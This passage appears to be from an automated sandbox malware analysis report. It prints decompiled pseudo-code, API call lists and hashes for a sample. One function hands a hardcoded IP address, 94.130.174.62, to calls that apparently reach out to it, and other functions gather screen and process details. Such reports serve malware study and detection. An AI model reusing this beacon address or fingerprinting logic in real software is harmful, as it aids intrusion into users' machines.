                                                                                				intOrPtr _t44;
                                                                                				intOrPtr _t51;
                                                                                				int _t55;
                                                                                				intOrPtr _t59;
                                                                                				void* _t63;
                                                                                				void* _t72;
                                                                                				void* _t81;
                                                                                				void* _t82;
                                                                                				void* _t85;
                                                                                
                                                                                				_t85 = __eflags;
                                                                                				_t63 = __ecx;
                                                                                				_push(0x48);
                                                                                				E004219DE(E004367DD, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t81 - 0x50)) =  *((intOrPtr*)(_t81 + 0x40));
                                                                                				 *((intOrPtr*)(_t81 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t81 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t81 - 0x1c)) = 0;
                                                                                				 *((char*)(_t81 - 0x2c)) = 0;
                                                                                				_push(1);
                                                                                				_t83 = _t82 - 0x1c;
                                                                                				 *((intOrPtr*)(_t81 - 0x54)) = _t82 - 0x1c;
                                                                                				 *((char*)(_t81 - 4)) = 2;
                                                                                				 *(_t81 - 0x4c) = 0;
                                                                                				E0040410F(_t83, _t81 + 0x24);
                                                                                				_push(_t81 - 0x48);
                                                                                				_t41 = E0040A0C4(0, _t63, __edi, _t83, _t85);
                                                                                				 *((char*)(_t81 - 4)) = 3;
                                                                                				E0040CFB8(_t81 - 0x2c, _t41);
                                                                                				_t64 = _t81 - 0x48;
                                                                                				 *((char*)(_t81 - 4)) = 2;
                                                                                				E00402C34(_t81 - 0x48, 1, 0);
                                                                                				_t44 =  *((intOrPtr*)(_t81 - 0x2c));
                                                                                				if( *((intOrPtr*)(_t81 - 0x18)) < 0x10) {
                                                                                					_t44 = _t81 - 0x2c;
                                                                                				}
                                                                                				_t80 = "ERROR";
                                                                                				_push("ERROR");
                                                                                				_push(_t44);
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					_t65 = "94.130.174.62";
                                                                                					goto L12;
                                                                                				} else {
                                                                                					_t51 =  *((intOrPtr*)(_t81 + 8));
                                                                                					if( *((intOrPtr*)(_t81 + 0x1c)) < 0x10) {
                                                                                						_t51 = _t81 + 8;
                                                                                					}
                                                                                					if(E0040CFFC(0, _t64, _t81 - 0x2c, _t51,  *((intOrPtr*)(_t81 + 0x18))) != 0xffffffff) {
                                                                                						E00403EAE(_t81 - 0x2c, 0, _t54 + 6);
                                                                                						_t90 =  *((intOrPtr*)(_t81 - 0x18)) - 0x10;
                                                                                						_t59 =  *((intOrPtr*)(_t81 - 0x2c));
                                                                                						if( *((intOrPtr*)(_t81 - 0x18)) < 0x10) {
                                                                                							_t59 = _t81 - 0x2c;
                                                                                						}
                                                                                						 *(_t81 - 0x4c) = E0041F4CD(_t72, _t90, _t59,  *((intOrPtr*)(_t81 - 0x50)));
                                                                                					}
                                                                                					_t55 = lstrlenA( *(_t81 - 0x4c));
                                                                                					_t65 = "94.130.174.62";
                                                                                					if(_t55 < 1) {
                                                                                						L12:
                                                                                						E00403A16(_t65, __eflags, _t80, 5);
                                                                                					} else {
                                                                                						E0040381A("94.130.174.62",  *(_t81 - 0x4c));
                                                                                					}
                                                                                				}
                                                                                				E00402C34(_t81 - 0x2c, 1, 0);
                                                                                				E00402C34(_t81 + 8, 1, 0);
                                                                                				E00402C34(_t81 + 0x24, 1, 0);
                                                                                				return E00421A61(0, 1, _t80);
                                                                                			}














                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040A845
                                                                                  • Part of subcall function 0040A0C4: __EH_prolog3.LIBCMT ref: 0040A0E3
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040A8BA
                                                                                • _strtok.LIBCMT ref: 0040A901
                                                                                • lstrlenA.KERNEL32(?,?,?,00000010), ref: 0040A90E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$H_prolog3H_prolog3__strtoklstrlen
                                                                                • String ID: 94.130.174.62$ERROR
                                                                                • API String ID: 3318954604-1872593727
                                                                                • Opcode ID: 6376aa1cdf51434db7c576cd6c961b7dd533c1df4c77a4f66db3e87ea8053bad
                                                                                • Instruction ID: 7184f00bf7badb2b699323761a46ef489fbcf5f22195b9144c2b7f79197de20c
                                                                                • Opcode Fuzzy Hash: 6376aa1cdf51434db7c576cd6c961b7dd533c1df4c77a4f66db3e87ea8053bad
                                                                                • Instruction Fuzzy Hash: DD3160B2D002089ADF14EFA9C8459DE7BB8AF54308F50842FF511B7181D7785A55CB6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00424C1E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t48;
                                                                                				intOrPtr* _t49;
                                                                                				struct _CRITICAL_SECTION* _t50;
                                                                                				intOrPtr _t51;
                                                                                				struct _CRITICAL_SECTION* _t54;
                                                                                				intOrPtr _t55;
                                                                                				struct _CRITICAL_SECTION* _t57;
                                                                                				intOrPtr _t58;
                                                                                				intOrPtr _t60;
                                                                                				signed int _t62;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t66;
                                                                                				struct _CRITICAL_SECTION* _t67;
                                                                                				intOrPtr _t75;
                                                                                				void* _t82;
                                                                                				struct _CRITICAL_SECTION* _t84;
                                                                                				signed int _t86;
                                                                                				void* _t87;
                                                                                
                                                                                				_t82 = __edx;
                                                                                				_push(0x10);
                                                                                				_push(0x443e28);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				_t84 = 0;
                                                                                				 *(_t87 - 0x1c) = 0;
                                                                                				E00429078(1);
                                                                                				 *((intOrPtr*)(_t87 - 4)) = 0;
                                                                                				_t86 = 0;
                                                                                				while(1) {
                                                                                					 *(_t87 - 0x20) = _t86;
                                                                                					if(_t86 >=  *0x44bdc0) {
                                                                                						break;
                                                                                					}
                                                                                					_t48 =  *0x44ada0; // 0x37b21b8
                                                                                					_t49 = _t48 + _t86 * 4;
                                                                                					if( *_t49 == 0) {
                                                                                						_t50 = E00422FFA(0x38);
                                                                                						_t75 =  *0x44ada0; // 0x37b21b8
                                                                                						 *(_t75 + _t86 * 4) = _t50;
                                                                                						__eflags = _t50;
                                                                                						if(_t50 != 0) {
                                                                                							_t51 =  *0x44ada0; // 0x37b21b8
                                                                                							_t54 = InitializeCriticalSectionAndSpinCount( *((intOrPtr*)(_t51 + _t86 * 4)) + 0x20, 0xfa0);
                                                                                							__eflags = _t54;
                                                                                							_t55 =  *0x44ada0; // 0x37b21b8
                                                                                							if(_t54 != 0) {
                                                                                								_t57 =  *((intOrPtr*)(_t55 + _t86 * 4)) + 0x20;
                                                                                								__eflags = _t57;
                                                                                								EnterCriticalSection(_t57);
                                                                                								_t58 =  *0x44ada0; // 0x37b21b8
                                                                                								_t84 =  *(_t58 + _t86 * 4);
                                                                                								 *(_t87 - 0x1c) = _t84;
                                                                                								 *(_t84 + 0xc) = 0;
                                                                                							} else {
                                                                                								E0041E008( *((intOrPtr*)(_t55 + _t86 * 4)));
                                                                                								_t60 =  *0x44ada0; // 0x37b21b8
                                                                                								 *((intOrPtr*)(_t60 + _t86 * 4)) = 0;
                                                                                							}
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_t6 =  *_t49 + 0xc; // 0x101
                                                                                					_t62 =  *_t6;
                                                                                					if((_t62 & 0x00000083) != 0 || (_t62 & 0x00008000) != 0) {
                                                                                						L9:
                                                                                						_t86 = _t86 + 1;
                                                                                						continue;
                                                                                					} else {
                                                                                						_t11 = _t86 - 3; // -3
                                                                                						_t94 = _t11 - 0x10;
                                                                                						if(_t11 > 0x10) {
                                                                                							L7:
                                                                                							_t64 =  *0x44ada0; // 0x37b21b8
                                                                                							E0041F923(_t86,  *((intOrPtr*)(_t64 + _t86 * 4)));
                                                                                							_t66 =  *0x44ada0; // 0x37b21b8
                                                                                							_t67 =  *(_t66 + _t86 * 4);
                                                                                							if(( *(_t67 + 0xc) & 0x00000083) == 0) {
                                                                                								_t84 = _t67;
                                                                                								 *(_t87 - 0x1c) = _t84;
                                                                                								break;
                                                                                							} else {
                                                                                								E0041F991(_t86, _t67);
                                                                                								goto L9;
                                                                                							}
                                                                                						}
                                                                                						_t12 = _t86 + 0x10; // 0x10
                                                                                						if(E00428FB6(0, _t82, _t84, _t86, _t94) == 0) {
                                                                                							break;
                                                                                						}
                                                                                						goto L7;
                                                                                					}
                                                                                				}
                                                                                				__eflags = _t84;
                                                                                				if(_t84 != 0) {
                                                                                					 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00008000;
                                                                                					 *((intOrPtr*)(_t84 + 4)) = 0;
                                                                                					 *((intOrPtr*)(_t84 + 8)) = 0;
                                                                                					 *_t84 = 0;
                                                                                					 *((intOrPtr*)(_t84 + 0x1c)) = 0;
                                                                                					_t40 = _t84 + 0x10;
                                                                                					 *_t40 =  *(_t84 + 0x10) | 0xffffffff;
                                                                                					__eflags =  *_t40;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t87 - 4)) = 0xfffffffe;
                                                                                				E00424D48();
                                                                                				return E00424445(_t84);
                                                                                			}


                                                                                APIs
                                                                                  • Part of subcall function 00429078: __mtinitlocknum.LIBCMT ref: 0042908E
                                                                                  • Part of subcall function 00429078: __amsg_exit.LIBCMT ref: 0042909A
                                                                                  • Part of subcall function 00429078: EnterCriticalSection.KERNEL32(?,?,?,00427A83,0000000D), ref: 004290A2
                                                                                • __mtinitlocknum.LIBCMT ref: 00424C75
                                                                                • __malloc_crt.LIBCMT ref: 00424CB6
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(004471C0,00000FA0,00443E28,00000010,00420295,00443B68,0000000C,00420312,0044858C,?,00000040,?,00413F80,00441460,?,?), ref: 00424CDA
                                                                                • _free.LIBCMT ref: 00424CEC
                                                                                • EnterCriticalSection.KERNEL32(004471C0), ref: 00424D03
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter__mtinitlocknum$CountInitializeSpin__amsg_exit__malloc_crt_free
                                                                                • String ID: @D
                                                                                • API String ID: 2015852156-1710841360
                                                                                • Opcode ID: 530944db4176f2cce46de6f7e99576cc982bc313fba6fff1c7fddfc863efc902
                                                                                • Instruction ID: c91d2d6b1077391c32b5af0c70127b63a248a1cb26134fbdc78a32f7d9ab27e6
                                                                                • Opcode Fuzzy Hash: 530944db4176f2cce46de6f7e99576cc982bc313fba6fff1c7fddfc863efc902
                                                                                • Instruction Fuzzy Hash: A131AF75A006219FD720DFAAE880A1DB7B5FF89324BD1412EE445877A1CB38E842CF49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E00415D92(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t27;
                                                                                				void* _t29;
                                                                                				struct HDC__* _t41;
                                                                                				void* _t52;
                                                                                				void* _t54;
                                                                                				void* _t57;
                                                                                				void* _t61;
                                                                                
                                                                                				_t61 = __eflags;
                                                                                				_t52 = __edx;
                                                                                				_push(0x7c);
                                                                                				E004219DE(E004372A5, __ebx, __edi, __esi);
                                                                                				_t54 = __ecx;
                                                                                				 *((intOrPtr*)(_t57 - 0x88)) = 0;
                                                                                				_t41 = CreateDCA("DISPLAY", 0, 0, 0);
                                                                                				 *((intOrPtr*)(_t57 - 0x88)) = GetDeviceCaps(_t41, 8);
                                                                                				 *((intOrPtr*)(_t57 - 0x84)) = GetDeviceCaps(_t41, 0xa);
                                                                                				ReleaseDC(0, _t41);
                                                                                				_push( *((intOrPtr*)(_t57 - 0x84)));
                                                                                				 *((intOrPtr*)(_t57 - 0x84)) = E00417463(_t41, _t57 - 0x80, _t52, _t54, 0, _t61);
                                                                                				_push( *((intOrPtr*)(_t57 - 0x88)));
                                                                                				_t46 = _t57 - 0x64;
                                                                                				 *((intOrPtr*)(_t57 - 4)) = 0;
                                                                                				_t27 = E00417463(_t41, _t57 - 0x64, _t52, _t54, 0, _t61);
                                                                                				 *((char*)(_t57 - 4)) = 1;
                                                                                				_t29 = E0040D3FA(_t57 - 0x64, _t57 - 0x48, 0x43e028, _t27);
                                                                                				 *((char*)(_t57 - 4)) = 2;
                                                                                				E0040D3C3(_t46, _t57 - 0x2c, _t29, "x");
                                                                                				 *((char*)(_t57 - 4)) = 3;
                                                                                				E0040D431( *((intOrPtr*)(_t57 - 0x84)), _t54);
                                                                                				E00402C34(_t57 - 0x2c, 1, 0);
                                                                                				E00402C34(_t57 - 0x48, 1, 0);
                                                                                				E00402C34(_t57 - 0x64, 1, 0);
                                                                                				E00402C34(_t57 - 0x80, 1, 0);
                                                                                				return E00421A61(1, _t54, 0);
                                                                                			}


                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00415D99
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415DB0
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00415DBB
                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00415DCA
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00415DD8
                                                                                  • Part of subcall function 00417463: __EH_prolog3_GS.LIBCMT ref: 0041746D
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDeviceH_prolog3_$CreateRelease_memmove
                                                                                • String ID: DISPLAY
                                                                                • API String ID: 3322158219-865373369
                                                                                • Opcode ID: 320da23f490a46f0a7e1eb9b6ab00bca2f46db6565805d5c87d081adc72a6b6f
                                                                                • Instruction ID: fff49b16c77df6326e33a8c402f58c98fb881de8dc74d5c2e94fe79e61922d8f
                                                                                • Opcode Fuzzy Hash: 320da23f490a46f0a7e1eb9b6ab00bca2f46db6565805d5c87d081adc72a6b6f
                                                                                • Instruction Fuzzy Hash: 48216571D01268ABDB25EBA5CD89EDF7F7CAF15304F10806AF109B2191DE781A48CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00417959
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,00000000), ref: 0041796B
                                                                                • EnumProcessModules.PSAPI(00000000,?,00000004,?,?,00000000,00000000), ref: 00417982
                                                                                • GetModuleBaseNameA.PSAPI(00000000,?,?,00000104,?,00000000,00000000), ref: 00417999
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004179A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen_memset
                                                                                • String ID: <unknown>
                                                                                • API String ID: 601403599-1574992787
                                                                                • Opcode ID: 3eb3499d1e4db55d28813fab3732cc1071487513bec8fa3fb69d21c8847ffb0b
                                                                                • Instruction ID: a35a1a13da738d729f3b7ded5826a352c87bdfac010df4f83b5a5a77c2a7d370
                                                                                • Opcode Fuzzy Hash: 3eb3499d1e4db55d28813fab3732cc1071487513bec8fa3fb69d21c8847ffb0b
                                                                                • Instruction Fuzzy Hash: F51184729006089BFB21DFA5DC45BDEBBB8BF09304F004029FA14EB182DB7455488FA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E00421AA7(void* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                				void* _t9;
                                                                                				char* _t11;
                                                                                				char* _t12;
                                                                                				void* _t16;
                                                                                				signed int _t17;
                                                                                				void* _t29;
                                                                                				char* _t30;
                                                                                				void* _t31;
                                                                                
                                                                                				_push(__ebx);
                                                                                				_t29 = E00427AED(__ebx);
                                                                                				if(_t29 != 0) {
                                                                                					if( *(_t29 + 0x24) != 0) {
                                                                                						L7:
                                                                                						_t30 =  *(_t29 + 0x24);
                                                                                						if(E0041E985(_t30, 0x86, E00421A7F(_a4)) != 0) {
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_t9 = E00424E89();
                                                                                							asm("int3");
                                                                                							_push(_t30);
                                                                                							_t31 = _t16;
                                                                                							if(_t31 != 0 && _t9 != 0 && _t9 != _t31) {
                                                                                								_push(0x86);
                                                                                								_t17 = 0x36;
                                                                                								 *(memcpy(_t9, _t31, _t17 << 2)) =  *_t10 & 0x00000000;
                                                                                								_t9 = E0042767D(_t10);
                                                                                							}
                                                                                							return _t9;
                                                                                						} else {
                                                                                							_t11 = _t30;
                                                                                							goto L5;
                                                                                						}
                                                                                					} else {
                                                                                						_t12 = E0042303F(0x86, 1);
                                                                                						_pop(_t16);
                                                                                						 *(_t29 + 0x24) = _t12;
                                                                                						if(_t12 != 0) {
                                                                                							goto L7;
                                                                                						} else {
                                                                                							_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                                							L5:
                                                                                							goto L6;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t11 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
                                                                                					L6:
                                                                                					return _t11;
                                                                                				}
                                                                                			}












                                                                                APIs
                                                                                • __getptd_noexit.LIBCMT ref: 00421AAE
                                                                                  • Part of subcall function 00427AED: GetLastError.KERNEL32(?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 00427AF1
                                                                                  • Part of subcall function 00427AED: ___set_flsgetvalue.LIBCMT ref: 00427AFF
                                                                                  • Part of subcall function 00427AED: __calloc_crt.LIBCMT ref: 00427B13
                                                                                  • Part of subcall function 00427AED: DecodePointer.KERNEL32(00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 00427B2D
                                                                                  • Part of subcall function 00427AED: GetCurrentThreadId.KERNEL32 ref: 00427B43
                                                                                  • Part of subcall function 00427AED: SetLastError.KERNEL32(00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 00427B5B
                                                                                • __calloc_crt.LIBCMT ref: 00421AD0
                                                                                • __get_sys_err_msg.LIBCMT ref: 00421AEE
                                                                                • _strcpy_s.LIBCMT ref: 00421AF6
                                                                                • __invoke_watson.LIBCMT ref: 00421B0B
                                                                                Strings
                                                                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00421ABB, 00421ADE
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                • API String ID: 3117964792-798102604
                                                                                • Opcode ID: 3b6c2e3c7325bf4e6ba60dde2116cbc9627c30affb51392990d5f08af89f3821
                                                                                • Instruction ID: 8e5ba2c0781951b18321fb437277fbe07dcb6d89093aa2eb5ecc7c50cc52e8fb
                                                                                • Opcode Fuzzy Hash: 3b6c2e3c7325bf4e6ba60dde2116cbc9627c30affb51392990d5f08af89f3821
                                                                                • Instruction Fuzzy Hash: 77F0247270133027DB2079677C8186BB2ACDBB472CB90043FF50893622FA2D9D01C29D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 90%
                                                                                			E00427A39(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr _t39;
                                                                                				void* _t40;
                                                                                
                                                                                				_push(8);
                                                                                				_push(0x443ee8);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				GetModuleHandleW(L"KERNEL32.DLL");
                                                                                				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                				 *((intOrPtr*)(_t39 + 0x5c)) = 0x439d78;
                                                                                				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                                                                				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                                                                				 *((char*)(_t39 + 0xc8)) = 0x43;
                                                                                				 *((char*)(_t39 + 0x14b)) = 0x43;
                                                                                				 *(_t39 + 0x68) = 0x4476d0;
                                                                                				E00429078(0xd);
                                                                                				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                                                                				InterlockedIncrement( *(_t39 + 0x68));
                                                                                				 *(_t40 - 4) = 0xfffffffe;
                                                                                				E00427ADB();
                                                                                				E00429078(0xc);
                                                                                				 *(_t40 - 4) = 1;
                                                                                				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                                                                				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                                                                				if(_t26 == 0) {
                                                                                					_t30 =  *0x447e38; // 0x37b1498
                                                                                					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                                                                				}
                                                                                				E0042767D( *((intOrPtr*)(_t39 + 0x6c)));
                                                                                				 *(_t40 - 4) = 0xfffffffe;
                                                                                				return E00424445(E00427AE4());
                                                                                			}








                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00443EE8,00000008,00427B41,00000000,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 00427A4A
                                                                                • __lock.LIBCMT ref: 00427A7E
                                                                                  • Part of subcall function 00429078: __mtinitlocknum.LIBCMT ref: 0042908E
                                                                                  • Part of subcall function 00429078: __amsg_exit.LIBCMT ref: 0042909A
                                                                                  • Part of subcall function 00429078: EnterCriticalSection.KERNEL32(?,?,?,00427A83,0000000D), ref: 004290A2
                                                                                • InterlockedIncrement.KERNEL32(004476D0), ref: 00427A8B
                                                                                • __lock.LIBCMT ref: 00427A9F
                                                                                • ___addlocaleref.LIBCMT ref: 00427ABD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                • String ID: KERNEL32.DLL
                                                                                • API String ID: 637971194-2576044830
                                                                                • Opcode ID: 87e45803e1f3d7438856e9eedef448d5ee7f429c962ade74b372d397880867b5
                                                                                • Instruction ID: d9ae5ec73da4cfcf12be51cb82c8a0ffbcc0e2efb6ca728e5dcb7ee9417f4179
                                                                                • Opcode Fuzzy Hash: 87e45803e1f3d7438856e9eedef448d5ee7f429c962ade74b372d397880867b5
                                                                                • Instruction Fuzzy Hash: 0101A171545B009FD720AF66E806749FBE0EF40328F60994FE496937A0CBB8AA45CF1C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 69%
                                                                                			E004231BC(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _t13;
                                                                                				void* _t16;
                                                                                				intOrPtr* _t20;
                                                                                
                                                                                				_t27 = __esi;
                                                                                				_t26 = __edi;
                                                                                				_t25 = __edx;
                                                                                				_t24 = __ebx;
                                                                                				_t13 =  *((intOrPtr*)( *_a4));
                                                                                				if(_t13 == 0xe0434352 || _t13 == 0xe0434f4d) {
                                                                                					__eflags =  *((intOrPtr*)(E00427B66(_t25, _t26, __eflags) + 0x90));
                                                                                					if(__eflags > 0) {
                                                                                						_t16 = E00427B66(_t25, _t26, __eflags);
                                                                                						_t5 = _t16 + 0x90;
                                                                                						 *_t5 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
                                                                                						__eflags =  *_t5;
                                                                                					}
                                                                                					goto L6;
                                                                                				} else {
                                                                                					_t34 = _t13 - 0xe06d7363;
                                                                                					if(_t13 != 0xe06d7363) {
                                                                                						L6:
                                                                                						__eflags = 0;
                                                                                						return 0;
                                                                                					} else {
                                                                                						 *(E00427B66(__edx, __edi, _t34) + 0x90) =  *(_t17 + 0x90) & 0x00000000;
                                                                                						_push(8);
                                                                                						_push(0x444098);
                                                                                						E00424400(__ebx, __edi, __esi);
                                                                                						_t20 =  *((intOrPtr*)(E00427B66(__edx, _t26, _t34) + 0x78));
                                                                                						if(_t20 != 0) {
                                                                                							_v8 = _v8 & 0x00000000;
                                                                                							 *_t20();
                                                                                							_v8 = 0xfffffffe;
                                                                                						}
                                                                                						return E00424445(E00423EA4(_t24, _t25, _t26, _t27));
                                                                                					}
                                                                                				}
                                                                                			}








                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 004231DD
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __getptd.LIBCMT ref: 004231EE
                                                                                • __getptd.LIBCMT ref: 004231FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                • String ID: MOC$RCC$csm
                                                                                • API String ID: 803148776-2671469338
                                                                                • Opcode ID: 1a40ab436ba34b118fcaeefa4d19f027c894b46aefca6e8869e0263b13f09841
                                                                                • Instruction ID: 5e88a8db040453f8efaeaef49caf4d6117122b5f792fcabfa7a92a085072d785
                                                                                • Opcode Fuzzy Hash: 1a40ab436ba34b118fcaeefa4d19f027c894b46aefca6e8869e0263b13f09841
                                                                                • Instruction Fuzzy Hash: B3E0ED317041248FC7209B69E08AB793AA4AB4531DF9504A7A51CCB322C72DAA50855A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E0040DBBA(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				char* _t239;
                                                                                				char* _t242;
                                                                                				char* _t269;
                                                                                				char* _t270;
